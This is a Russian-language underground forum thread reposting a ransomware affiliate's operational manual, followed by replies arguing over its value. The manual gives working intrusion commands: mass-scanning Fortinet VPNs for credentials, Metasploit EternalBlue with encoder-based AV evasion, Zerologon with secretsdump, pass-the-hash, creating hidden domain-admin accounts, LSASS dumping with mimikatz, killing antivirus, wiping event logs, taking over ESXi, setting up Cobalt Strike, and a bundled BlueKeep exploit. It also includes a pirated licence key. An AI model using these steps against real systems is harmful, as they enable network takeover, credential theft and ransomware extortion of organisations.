• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Видоизменённый углерод

yashechka

Генератор контента.Фанат Ильфака и Рикардо Нарвахи
Эксперт
Регистрация
24.11.2012
Сообщения
2 344
Реакции
3 563
1647952025636.png


Всем привет. У нас на форуме очередной конкурс статей, а моей темы опять нет, поэтому я решил тоже что-то сделать из того, что есть в списке, а именно взять статью Бастера и Бори и немножко её подретушировать. Как известно, я дотошен до дизайна и я за минимализма, так что встречайте мой Видоизменённый углерод - выкинуты картинки с аниме, (или что там точно, я х.з. этот жанр не перевариваю), все раскрашено вручную, проставлены запятые, точки, короче, исправлена грамматика и пунктуация. Надеюсь я не зря старался и Вам понравится.

Мануал по работе с сетями от Bassterlord (FishEye)

Предисловие


Этот мануал рассчитан для новичков в теме. Но прежде всего на людей, которые будут работать на меня. Вся информация будет изложена в формате методички. Тут не будет бессмысленных объяснений как работает определенный эксплоит и гор непонятного кода, мы будем применять сразу его на практике.

??? Как развернуть окружение ???

Нам понадобится:

1. Плеер виртуалка - обязательно именно эта - (https://www.vmware.com/products/workstation-player.html) (Примечание от Яши - Почему именно эта, а не бокс, я не понял)
2. ВПН (https://rus.privateinternetaccess.com/) — предпочтительно использовать его на основной машине (не на виртуалке)
3. Кали линукс торрент - (https://images.kali.org/virtual-images/kali-linux-2021.2-vmware-amd64.7z.torrent)
4. Любая винда 10
5. ЭнМап - (https://nmap.org/dist/nmap-7.92-setup.exe)
6. Мимикатз - (https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210810-2/mimikatz_trunk.zip)
7. ГМЕР - (http://www.gmer.net/#files)
8. СофтПерфектСканер — (https://www.softperfect.com/products/networkscanner/) платный, использовать только на виртуалке, не кидать на пробитые компы (рядом в архиве будет бесплатный кряк)
9. ПиСекДамп - (https://github.com/pentestmonkey/pysecdump)
10. ПиЭсЭкэк - (https://docs.microsoft.com/en-us/sysinternals/downloads/psexec)
11. Фортинет впн клиент- (https://links.fortinet.com/forticlient/win/vpnagent)
12. ПроцДамп - (https://docs.microsoft.com/en-us/sysinternals/downloads/procdump)
13. ПаверТул (будет в архиве рядом с документом)
14. Метасплоит - (https://windows.metasploit.com/metasploitframework-latest.msi)
15. Блюкип эксплоит для порта 3389 под винду (лежит рядом в архиве)
16. Импакет - (https://github.com/SecureAuthCorp/impacket)
17. Зерологон эксплоит (лежит в архиве cve-2020-1472-exploit.py)
18. Фортинет эксплоит - (https://github.com/7Elements/Fortigate)
19. Веракрипт - (https://www.veracrypt.fr/en/Downloads.html)
20. Аренда сервака - 150$ в месяц - писать через жабу bearhost@thesecure.at
21. ТОКС для общения и переписок - (https://tox.chat/download.html)

Конечная схема будет выглядеть так:

1647952563439.png


Установка софта в кали

Запускаем виртуалку, вводим логин kali пароль kali. Копируем fortinet vpn 123.deb в кали в папку home. Открываем консоль и вводим:

sudo dpkg -i 123.deb

Вводим пароль kali и жмем Энтэр (пароли в кали не отображаются в консоли, надо вводить вслепую). Далее вводим:

sudo git clone https://github.com/SecureAuthCorp/impacket
cd impacket
sudo python setup.py install


Если потребует пароль, то вводим kali.

Установка софта на виртуалке винды

Устанавливаем все по списку со скрина со всеми настройками по дефолту. Ставим питон https://www.python.org/downloads/ Копируем папку импакет на диск C:\
Открываем командную строку в виндовс от имени Администратора и вводим команды:

cd c:\impacket
python setup.py install


В папку impacket копируем зерологон эксплоит на питоне: cve-2020-1472-exploit.py
Все остальное устанавливаем по дефолту, а софты копируем на рабочийстол.

Сбор материала и как его добывать

Для добычи материала для работы идем на сервис - (http://masscan.online/ru). Покупаем аккаунт на ваш выбор и сканируем весь мир на популярные HTTPS порты, пример ниже:

1647952736944.png


После завершения сканирования скачиваем результаты. Заходим в кали. Открываем консоль и пишем:

git clone https://github.com/7Elements/Fortigate
cd Fortigate
pip3 install -r requirements.txt
fortigate.py [-h] [-i INPUT] [-o OUTPUT] [-t THREADS] [-c CREDSCAN]
fortigate.py -i текстовик_с_нашими_айпи -O valid.txt -t 10 -c y


Запускаем и ждем валида. По итогу мы получим что-то типа:

1647952843815.png


Это и будет наш материал для работы. Копируем наш валид на виртуалку с виндой и смотрим следующий раздел.

RANSOMWARE = Терроризм. Все ваши действия, которые вы будете выполнять далее вы делаете на свой страх и риск. Однако данный риск приносит миллионы!!! Я не пропагандирую рансом, это просто ман по пентесту.

Начало работы


Первым делом мы заходим в нашу виртуалку под виндовс. Открываем Фортинет впн клиент.

1647952905372.png


Жмем конфигурировать VPN.

1647952928489.png


Далее вводим логин и пароль впна.

1647952949999.png


В случае успешного подключения вы увидите:

1647952971083.png


Далее рекомендую скопировать кмд файл route_print.cmd на рабочий стол из архива и запустить его. Видим следующую картину и обращаем внимание на интерфейс и маску сети:

1647953019462.png


В данном случае мы видим диапазон 10.102.96.0 — 255.255.255.0. Это значит, что в сканере мы будем прописывать его таким образом:

10.102.96.0 — 10.102.96.255

Если бы мы видели такую картину:

10.102.0.0 — 255.255.0.0

Тогда в сканере мы будем прописывать

10.102.0.0 — 10.102.255.255

Если мы видим сверху 2 раза

0.0.0.0 — 0.0.0.0
0.0.0.0 — 0.0.0.0


Значит мы сканим и диапазоны сети как на примере выше. Если они есть. Если их нет и присутствуют двойные строки с нулями тогда мы берем и сканируем полностью диапазон.

192.168.0.0 — 192.168.255.255

Открываем наш сканер СофтПерфектСканер и вводим полученные диапазоны.

1647953141538.png


Нажимаем CTRL+O. Откроется настройки сканера. Все выставляем как у меня на скринах.

1647953166760.png


1647953196448.png



1647953205416.png


1647953213747.png


1647953222626.png


Переходим к настройкам аккаунтов. Тут мы впишем логины и пароли от нашего впна.

1647953276382.png


Если вы используете платную версию сканера, то у вас будет поле интеграция с нмап.

1647953296707.png


Ставим галочку на Етернал и запускаем сканирование.

1647953328538.png


После завершения сканирования мы будем видеть что-то подобное:

1647953352754.png


Наша задача отсортировать результаты по рабочей группе и по ТиСиПи портам. И проверить наличие красных дисков C$ в плюсах под столбцом Айпи адрес.

1647953388028.png


Также не забываем, что если у нас платная версия сканера. Нам необходимы некоторые альтернативные настройки:

1647953414661.png


1647953423905.png


Порты и их соответствия с сервисами.

Общие: 135,137, 139, 445, 8080, 80, 443
Синолоджи НАС: 5000,5001
Виам бэкап: 9443, 9392, 9393, 9401, 6160
БД МайЭсКюЭль, ЭмЭcЭсКюЭль, Постгрес: 3306,1433,50000,5432,5433
Оракл: 1521,1522
Ремут Контрол: 22, 21 ,3389, 4899, 5900
НФС: 111, 1039, 1047, 1048, 2049
Iscsi: 860, 3260
Репликация: 902, 31031, 8123, 8043, 5480, 5722
Sophos Веб: 4444
Софос Консоль : 2195, 8190, 8191, 8192, 8193, 8194, 49152-65535


В крайней правой колонке в поле скана мы будем наблюдать уязвимые устройства для уязвимости Eternal Blue (МС-17-010). Далее мы рассмотрим эксплуатацию данной уязвимости подробно.

МС-17-010 (Этернал Блю)

Для эксплуатации уязвимости на понадобится Метасплоит установленный на виртуальной машине. Открываем консоль КМД в виндовс. Прописываем msfconsole, жмем Энтер и ожидаем загрузки нашего метасплоита

1647953676315.png


После загрузки метасплоита вводим поочередно команды:

1647953729876.png


1647953739914.png


setg LHOST айпи_нашего_впна
setg RHOSTS айпи_наших_уязвимых_устройств_через_запятую
use exploit/windows/smb/ms17_010_psexec
set payload payload/windows/meterpreter/bind_tcp
exploit


Конечный результат выглядит так:

1647953758395.png


Жмем Энтэр и надеемся на успех. В случае успешной эксплуатации вы увидите это:

1647953786638.png


В случае ошибки ACCESS DENIED - можно попытаться зашифровать полезную нагрузку от антивирусов командами указанными ниже:

set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
set encoder x86/shikata_ga_nai
set ExitOnSession false
set SessionCommunicationTimeout 0
exploit


Далее ожидаем завершения процесса и смотрим активные сессии через команду meterpretera. Команда sessions выводит список компьютеров по нумерации, который удалось пробить эксплоитом.

1647953846450.png


В нашем случае мы имеем 2 открытые сессии. Перейдем к первой командой sessions 1. Далее введем команды:

getsystem
load kiwi

sysinfo
– тут нас интересует находится ли компьютер в домене. В данном случае мы видим, что да, он находится в домене.

1647953891809.png


Далее вводим команду hashdump. Получаем список хешей пользователей и копируем их в отдельный текстовик.

1647953918817.png


Далее вводим creds_all — эта команда попытается вытащить не зашифрованные пароли из системы.

1647953943195.png


Также копируем их в отдельный текстовый документ. Если у нас несколько сессий в метерпретере, тогда вводим команду bg и повторяем вышеизложенные пункты начиная с sessions, только теперь мы вводим sessions 2 и т.д. пока не пройдемся по всем сессиям. Далее не закрывая консоль мы идем на сервис
https://www.crackmd5.ru/ и пробуем разшифровать полученные хеши. Так как мы уже получили открытые пароли учетных записей из команды creds_all, то вбиваем их в сканер через Настройки -> Управление аккаунтами.

1647953985257.png


Вводим учетные записи в формате - Домен\логин пароль. После этого закрываем панель управления аккаунтами, выделяем все айпи адреса и делаем рескан сети:

1647954010465.png


После открываем все плюсы в столбце Айпи адрес и смотрим полученные права. Нас интересуют красные локальные диски C$.

1647954042106.png


Если красные диски есть везде в домене, это означает что мы получили права домен администратора в сети и у нас везде есть права на чтение и изменение данных на удаленной машине.

Если только на нескольких машинах, значит только права локальных администраторов и стоит искать другие учетные записи.

Если у нас нет открытых паролей, а только хеши, которые не вышло расшифровать, мы рассмотрим уязвимости входа по хешам в разделе ПАС ЗЭ ХЭШ.

Если в открытом компьютере с красным диском C$ нет порта 3389, можно использовать тулзу psexec которую мы рассмотрим в отдельном разделе.

Если мы пробили через уязвимость сервер - определить его можно по следующим параметрам и сравнив айпи сессий:

1647954137193.png


Либо по имени хоста в котором присутствует ДК. Например WHDC.domain.local (значения могут быть любыми, нам важно узнать именно ДК). Тогда можно в сессии сервиса выполнить команды:

shell
net group
net group "Domain Admins" /domain


Это поможет узнать нам учетные записи администраторов домена и соответственно не отвлекается на обычных юзеров и их аккаунты. Нам ведь важен уровень "БОГ" да? ;)

Зэрологон

Для эксплуатации уязвимости нам необходимо просканировать сеть и определить ДК – Домен контроллер.Как его определить описано выше. Нам необходимо быть подключенным к сети на которой мы производим эксплуатацию, а также иметь установленный на виндовс Питон. Также Импакет распакованный по пути C:\impacket с уже лежащим в нем эксплоитом cve-2020-1472-exploit.py Также на рабочий стол поместить кмд файл с таким содержанием:

1647954287014.png


Мы будем его переписывать и запускать на необходимые нам цели в сети.

1647954304325.png


Делаем сортировку по аккаунтам пользователей и подставляем нужные нам значения до первой точки как на скриншоте ниже:

1647954323834.png


Сохраняем файл Zerologon.cmd и запускаем его. Далее все зависит от того запатчен ли сервер от данной уязвимости или нет. Повторяем это действие на всех ДК по очереди пока не получим положительный результат:

1647954355023.png


Если строка Performing authentication attempts идет более 4 минут или выдает нам отрицательный результат переходим к следующему ДК или используем другие уязвимости если все ДК не подвержены уязвимости. Иногда ДК никак не выдают себя и необходимо просканировать данным эксплоитом все машины в домене (рабочей группе), но это дает свои плоды. После успешной эксплуатации идем в наш кали подключаемся к впну компании.

1647954401970.png



Открываем консоль и вводим следующее:

cd impacket/examples
sudo python3 secretsdump.py -no-pass -just-dc AGLEADER/ag40server\$@192.168.16.27

1647954427801.png


Жмем Энтэр. Нас попросит ввести пароль. Вводим вслепую kali и жмем Энтэр. (Помним, что в кали не отображается вводимый пароль по этому вслепую). У нас должен пойти процесс извлечение учеток и хешей.

1647954459836.png


После окончания копируем все, что выдаст нам консоль.

Далее идем на сервис https://www.crackmd5.ru/ Пробуем расшифровать хеш администратора (выделен желтым цветом)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee:::
В случае если мы разшифруем пароль, смело ломимся во все компы с даннымы кредами, не забывая подставить рабочую группу пример:

AGLEADER\Administrator и наш пароль.

Если мы не получаем пароль нам необходимо использовать атаку ПАС ЗЭ ХЭШ.

1647954531759.png
 
Последнее редактирование:
Ту би континью. Плиз вэйт. Стэй тюнэд.
 
Пасс Зэ Хэш

Итак у нас есть хеши, но пароль от учетки админа мы не смогли получить. Возвращаемся в кали. Если закрыли консоль, то открываем снова и вводим:

cd impacket/examples
sudo python3 smbexec.py -hashes
aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee
Administrator@192.168.16.27


либо

sudo python3 psexec.py -hashes
aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee
Administrator@192.168.16.27


Данные подставляем полученные из эксплуатации Зэрологин

1647963174901.png


После выполнения мы получим КМД на удаленной машине ДК– C:\Windows\system32>

Далее вводим следующие команды:

net user support Pa$$wo0rd /add
net user support /active:yes
net localgroup Administrators support /add


Если ломимся по "громкому" можем создать сразу своего доменного администратора

net group "Domain Admins" support /add

После этого мы получаем свою учетную запись с правами домен администратора, а соответственно можем вломится во все машины на домене по учетной записи:

support Pa$$wo0rd

Далее заходим ДК и снимаем креды домен админов мимикадзом64.exe или мимикодзам32.exe. Команды для мимикадза такие:

privilege::debug - log 1234.txt - sekurlsa::logonPasswords full

Обходы АВ


Мы подключились к компу. Первым делом смотрим трей возле часов и отображающиеся там значки и ищем ав. Если на компе установлен простой виндовс дефендер заходим в настройки и добавляем в исключения диск C:\

1647963380896.png


1647963391080.png


Обычно антивирусы без пароля можно тупо деинсталировать через мастер удаления программ в виндовс. Важно если мы видим установленные ав Софос (синего цвета) или Сентинель на всех машинах дальнейшая работа с данной компанией будет бессмысленна.
Другие же антивирусные решения можно спокойно убить через 2 тулзы:

- ГМЕР
- ПаверТул


Если ав убить не получается, то открываем реестр виндовс и переходим по пути:

HKEY_LOCAL_MACHINE\SOFTWARE

и ищем папки с названиями АВ

Если находим, то смотрим все подпапки которые есть в папке с ав. Наша цель найти папки и значения внутри них с названием Exclusions (исключения)

Предположим мы нашли значение исключений, допустим С:\users\admin\java.exe

Переименовываем наш мимикатз или вредонос в java.exe и кидаем по данному пути. Если такого пути или папок нет на этой машине создаем папки 1 в 1 как указано в исключениях и пробуем запустить наш файл. В большинстве случаев ав их не видит если, он не слишком умный ) Если у нас не выходит ничего из вышеперечисленного, топаем на все машины в домене по порту 3389 из сканера и смотрим установлен ли ав там.

Если ав не установлен на нескольких машинах можно закинуть туда портативный СофтПерфектСканер и просканить сеть изнутри смонтировать диски и запустить наш ****р извините подавился =D

1647963569219.png


В идеале нужно убить ав везде где можно и добавить в исключения диски C:\ А компы на которых нет порта 3389 в том числе и НАС хранилища смонтировать и уже потом начинать л**** да что-ж такое =D

НАС и бекапы

Самая сложная часть )


Итак доступ к домен админу мы получили. Делаем скан сети изнутри. Смотрим все порты . Обычно нас хранилища висят на портах 5000, 5001, а бекапы Вим - 9443, 9392, 9393, 9401, 6160, Веритас Бэкап - 6101, 10000, 3527, 6106, 1125, 1434, 6102, сервер - 3527, 6106 либо они будут подписаны в имени хоста как НАС. Обычно насы висят вне домена. Первым делом смотрим скан. Если у нас появился доступ к ним из обычного скана с учетками домен админа все супер.

Однако если насы в воркгруппе можно пробить всех домен админов и попробовать залогинится в них по кредам без домена с пробитых учеток через веб интерефейс открыв айпи НАСА через браузер и указав порт НАСА через двоеточие. В 40% случаев креды домен админов должны подходить. Если не подходят, то берем учетку Administator и ее пароль. Логинимся в НАС как Admin с тем же паролем, либо перебираем пароли от других домен админов вероятность пробива повышается. Иногда при сканировании НАСов через СофтПерфектСканет отображаются учетные записи которые активны в хранилище обычно это: Admin, backup, Sysadm и прочее. Если мы открыли сеть через ПАСС ЗЭ ХЭШ ищем в результатах полученых хешей эти учетки и достаем от них пароли через сервис взлома хешей. С вимами и прочими бекапами та же тема. И самое важно на этапе ***** нам необходимо начинать с дисков и компов где больше всего памяти и от 500 гигов и больше. Соответственно самым важным и первым будет идеально зафигачить БИГДАТУ.

1647963808244.png


VС и ESXI

Данный раздел за меня проведет великий и ужасный: Борис Николаевич Ельцин аka https://xss.pro/members/204378/



Фишка в том, что тебе ав не нужно обходить. Для начала нужно получить креды от вицентра. В 60 процентах он в домене и пускает по кредам ДК. В остальных случиях кейлогер. В своей работе я часто сталкиваюсь с задачей сброса рут пароля на esx. Представим ситуацию, что у нас есть креды администратора vcenter, есть домен админ и вся сеть готова к *****, но никак не удалоcь поймать пароль под esx, вот один из способов.

Без перезагрузки, без лишнего палева. НО Я НАСТОЯТЕЛЬНО РЕКОМЕНДУЮ РЕСИТЬ ПАСС В НОЧЬ ПЕРЕД НАКРЫВОМ СЕТИ. Т.е вы сбрасываете пароль и сразу шифруете. Этот способ заключается в том, что мы введем esx в домен и сможем авторизоваться по кредам доменного админа. Идем на ДК, открываем Active Directory Users and computers и создаем там глобальную группу ESX Admins, обязательно включаем туда своего доменного админа. Далее возвращаемся в vcenter. Выбираем esx хост нажимаем Сonfigure - Autentication Service - Join domain вводим домен в формате domain.local или domain.com. Какой домен можно узнать введя systeminfo на компе в домене. Вводим логин домен админа без домена и его пароль. Теперь все готово для авторизации, заходим в esx хост используя креды доменного админа и сбрасываем рут пасс. Потом просто по ыыр заходишь на esx. Выключаешь машины. И делаешь грязные дела =)

ПиЭсЭксзэк

В этом разделе мы рассмотрим тулзу ПиЭсЭксзэк и чем она будет полезна на практике. Первым делом она поможет нам запустить любой файл на всех тачках к которым у нас есть доступ. Предположим у нас есть exe файл который нам нужно запустить. Открываем КМД, перетаскиваем туда psexec.exe и далее пишем следующее:

1647964141214.png


Если вы удалили все ав, добавили исключения и сделали все как нужно, то данный exe будет запущен на всех компах. Если вам нужно запустить файл от имени системы, то добавляем к параметрам -s -d -c файл.exe Через ПиЭсЭксзэк можно получить и снять креды с удаленных компов если на них нет 3389 порта, но учетка у нас есть. Через сканер открываем папку C$ закидываем туда pysecdump.exe и procdump.exe.

1647964186918.png


Итак мы вошли в тачку делаем:

cd C:\
pysecdump.exe -s


Эта команда выдаст нам хеши админа на удаленном компе пытаемся поломать через сайт или используем ПАСС ЗЭ ХЭШ в кали на других тачках. Далее делаем так:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
procdump.exe --accepteula -ma lsass.exe lsass.dmp


В случае успеха на удаленной тачке на диске C:\ будет создан lsass.dmp файл.

Копируем его на свой комп рядом с мимикатзом. Открываем мимикатз и делаем в нем:

sekurlsa::minidump lsass.dmp
privilege::debug
log 1234.txt
sekurlsa::logonPasswords full


Он также выдаст нам креды или хеши. Далее можно попробовать удаленно включить рдп порт командой

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Не всегда срабатывает! После выполнения команды можно будет подрубится к РДП. Не забываем после всего удалить все файлы и следы работы на удаленной тачке.

После всех действий, если желаете минимально затереть следы своего пребывания и отложить взлом. На машинах в которые вы заходили по РДП можно открыть ПаверШелл и прописать следующее:

wevtutil el | Foreach-Object {wevtutil cl "$_"}


Эта регулярка сотрет все журналы.

Также команды на удаление скрытых учеток:

user support Pa$$wo0rd /delete
net group "Domain Admins" support /delete

Кобальт Страйк


Проще говоря выше описаные мной методы полностью нахрен исключают кобальт, ну если народ просит почему бы и нет?

Короче, арендуем сервак на линукс и закидываем туда кобальт и делаем в консоли:

cd cs4.0
java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -javaagent:Hook.jar -classpath ./cobaltstrike.jar server.TeamServer АЙПИ СЕРВАКА 12345


Переходим на свою тачку, я работаю с винды в кобальте, для этого надо предварительно установить Яву. Запускаем cobaltstrike.bat

1647964489996.png


Вводим айпи нашего арендованного хоста учетку и пароль который указан в конфиге выше. Идем в раздел:

1647964518009.png


Создаем прослушиватель:

1647964532282.png


Далее создаем пейлоад:

1647964550028.png


После нажатия кнопки Генерейт у нас будет экзэшник. Пихаем его на ДК и запускаем там же. Далее делаем так:

1647964573494.png


Там же делаем:

1647964582663.png


Дальше идем в:

1647964604035.png


1647964619843.png



Выделяем все тачки в сети и пытаемся ломится в них по хешу админа:

1647964638747.png


1647964648582.png


Стоит упомянуть, что не всегда тачки выходят в общий инет. Тогда делаем

1647964677137.png


1647964685862.png


Мы превращаем зараженный комп в локальный прослушиватель на который будут стучать все тачки на районе =D. Про остальной функционал расписывать нет смысла, так как по мне кобальт подходит только для удобного снятия кредов и поиска кредов от НАСов. А так это просто гуан летучей мыши, которое палится как новогодняя елка всем чем можно, а крипт на это гуан стоит ебических денег и ты еще пограммиста найди который пейлоад перепишет, ага.

БЛЮ-КИП

Я жертвую вам в дар самописный эксплоит для 3389.

1647964766643.png


Все что нужно сделать, это добавить айпи с 3389 в столбик без портов и запустить run.bat. Если открыть run.bat через текстовик мы увидим креды скрытой учетки, которая будет создаваться на пробитых экспом компах. Гуды будут сохранены в отдельный текстовик. Эксп сначала пытается перевести удаленные тачки в синий экран и ждет их перезагрузки. После перезагрузки он автоматически исполняет пейлоад и мы получаем скрытую учетку с правами админа на уязвимом компе.

Этот эксп необходимо перезапускать 2-3 раза, он не всегда срабатывает как нужно, это связано с таймингами перезапуска на удаленных тачках. Ну а теперь после того как мы похоронили селлеров рдп доступов можно переходить к заключению.

Тут собраны знания которые помогут вам заработать так или иначе это все, что я знал. Источник иллюстраций к данному мануалу взят из манхвы "Fish Eye Placebo" https://www.yuumeiart.com/ (Примечание от Яши: А я думал, что это все Шива :3 ). Я не спорю, что есть люди умнее меня и с куда белее обширным багажом знаний, но как по мне этого хватит для пентеста любой сети будь то цитрикс, циско, пало альто, фортик, пульс етк.

Бонус лицуха на софтперфект до 2022

dUYiN30Q4+ydHwgPCwku3K+FYDomodEqW0bRGcTyxvdnlc7g4nne7cfwXOGPJbBVdPeqEs7jzX2yDiVxxiiNaCvNK4T7ML0Qfarren5vr
MZEBcoOivf7QQ05BPxSG370cIus/AZxAuRAcibpckx1Ie+R4UTNiyBh6ZVcIwii+8M1lnRp+lcRmFqbgLGZ/cbzzh09IfaFKwoGJRPcTcnizxQtBJSk9sqlbNc6SwWeiQgl+0J+A1mrkrG3zd03vSjBUbc8daN08ebjOGYDsZVptkkhe5ASAJt/Uwzs0QCqO2issqS+QpE/atLV3lR63k/
2G1y6yECKu7w+s1SV9aEKsxKhuBJplKLhbGoQIX7hGxDwww1HFLGqCZbAce1mz7aP6xqqltEgoM2oVvKv02tVUoLGYSHYtAGGoaksl
XXu4+MLs26nLUoltIfIcOC1dOQsjChjXil8Im+dDOY+V1m5M0e2GckmBjTX4blWbz+hOmjl23n6f0jSndxT70Dd3Jl9


1647964897610.png
 
!!!Боре и Бастеру, привет, где бы Вы ни были!!!
 
Вы сами это все вот так вот делали и получили какие то результаты?
Может поделитесь вышей личной статистикой по всем этапам?
 
Вы сами это все вот так вот делали и получили какие то результаты?
Может поделитесь вышей личной статистикой по всем этапам?
Я ничего не делал, просто преобразовал ПДФ бастера в удобочитаемую форму. Дцмаю он все достаточно точно все рассказал что и как. Единственное, что фортигейт задрочили так, что его уже нет дырявого и все пропатчились.
 
Ну вы хотя бы иногда делайте то о чем пишете, а то вдруг там овраги и всякое такое разное чего с бумаги не видно... Вы бы вряд ли хотели бы действовать по статьям человека который сам не пробовал.
 
Вы сами это все вот так вот делали и получили какие то результаты?
Может поделитесь вышей личной статистикой по всем этапам?
делал - х*ня статистика выйдет братек виспер
 
делал - х*ня статистика выйдет братек виспер
А статья чоткая? Может вы все не так как вней делали =)) Если че я аффтара подводил к тому что надо бы сначала самому попробовать, а то автор привык делать переводы там претензий нет, но тут он имхо не прав, не по понятиям короче выходит.
Если че статья грибника тоже нихуя не полезная но он хотя бы про реалии, пусть и в рамках своих инструментов и методик про которые нихуя не ясно. Но то как делает Яша совсем не хорошо.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Но то как делает Яша совсем не хорошо
Вечно недоволен всем, авторские статьи негодные, переводы негодные, один ты годный у нас. Пиши штоле сам уже статью (или перевод), а то сколько можно негодноту читать.
 
Вечно недоволен всем, авторские статьи негодные, переводы негодные, один ты годный у нас. Пиши штоле сам уже статью (или перевод), а то сколько можно негодноту читать.
Вы в этом треде увидели где то авторскую статью? О каком авторе речь? ...мне неловко вас спросить о таком но все же ясность по этому поводу была бы нам обоим на пользу, и так скажите - вы идиот?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Вы в этом треде увидели где то авторскую статью?
переводы негодные

вы идиот?
Это неважно, важно, что тебя ничего не может удовлетворить, может ты сам себя смог бы удовлетворить своей авторской статьей. Попробуй.
 
Это неважно, важно, что тебя ничего не может удовлетворить, может ты сам себя смог бы удовлетворить своей авторской статьей. Попробуй.
На самом деле важно. Чтоб получался нормальный диалог с человеком важно понимать нюансы его психики. У меня есть друг он очень хорошо образован(физик ядерщик), я нередко завидую тому что умеет его мозг, но у него имеет место быть и идиотинка, и особенно сильно это вскрылось во время ведения совместного бизнеса, и с тех пор - когда ему нужно принять важное решение, например про финансы, он делится своими мыслями и внимательно выслушивает советы друзей. Не подумайте что держу на вас зло или что то в таком духе.
 
Ну вы хотя бы иногда делайте то о чем пишете, а то вдруг там овраги и всякое такое разное чего с бумаги не видно... Вы бы вряд ли хотели бы действовать по статьям человека который сам не пробовал.
Ну если Вы мне подарите 48 часов в сутках, или 24, но чтобы я не спал, и не пил таблетки, то с радостью))
 
Ну если Вы мне подарите 48 часов в сутках, или 24, но чтобы я не спал, и не пил таблетки, то с радостью))
Вы сами подарите себе вместо написания следующего матриала, попробовать материал на практике, вдруг это что то вам даст в плане личного и профессионального роста. Имхо если бы вы вместо написания этой статьи просто проделали то что там написано, была бы польза хотя бы для вас. Впрочем дело ваше, но хотя бы указвайте что лично вы сами всего описанного в статье не делали, и прямо вот в предисловии, что бы читающий соотвественно оценивал материал, это важно.
 
Вы сами подарите себе вместо написания следующего матриала, попробовать материал на практике, вдруг это что то вам даст в плане личного и профессионального роста. Имхо если бы вы вместо написания этой статьи просто проделали то что там написано, была бы польза хотя бы для вас. Впрочем дело ваше, но хотя бы указвайте что лично вы сами всего описанного в статье не делали, и прямо вот в предисловии, что бы читающий соотвественно оценивал материал, это важно.
Цель была другая. Можете открыть исходный ПДФ и посмотреть что было на входе и что получилось на выходе.
 
Мне вот тут сказали, что американские датасеки вязли этот ман на вооружение, поэтому мне стыдно было его в том виде держать, я для них постарался и переоформил, хотел как лучше а получил как обычно подливу, впрочем я не удивлен.
 
Цель была другая. Можете открыть исходный ПДФ и посмотреть что было на входе и что получилось на выходе.
Значит ваша цель была не в том что бы предоставить годный материал. Годный материал это лично проверенный(если речь не о переводе), про не проверенный указывают что - он не проверен на практике. Пишите любой материал какой хотите, просто найдите немного совести указать что сами не пробовали то о чем написано.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх